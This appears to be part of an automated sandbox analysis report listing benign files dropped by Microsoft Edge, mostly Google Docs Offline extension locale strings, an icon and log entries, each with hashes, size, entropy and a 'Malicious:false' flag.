                                                                                                                                                                                                                                                                                                      SHA-256:6E70F23B4D8689AE7CAA36778130387E57D7560D3CE9C78AECFC7789444FD4C1
                                                                                                                                                                                                                                                                                                      SHA-512:E963B2C80496804AD65110469CEFC1786F77DEE22584AD404D0C1D194B4B630C0178CF7B7F18DB242FF93D7822E6669F3CEA7A7DF66927990EE384DE3F351AFF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\f5ea16bd-c817-4980-ab13-e00efd0bb601.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\f5f787a7-1d88-4ac0-a0b3-b5a06dc0950b.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                      Malicious:false
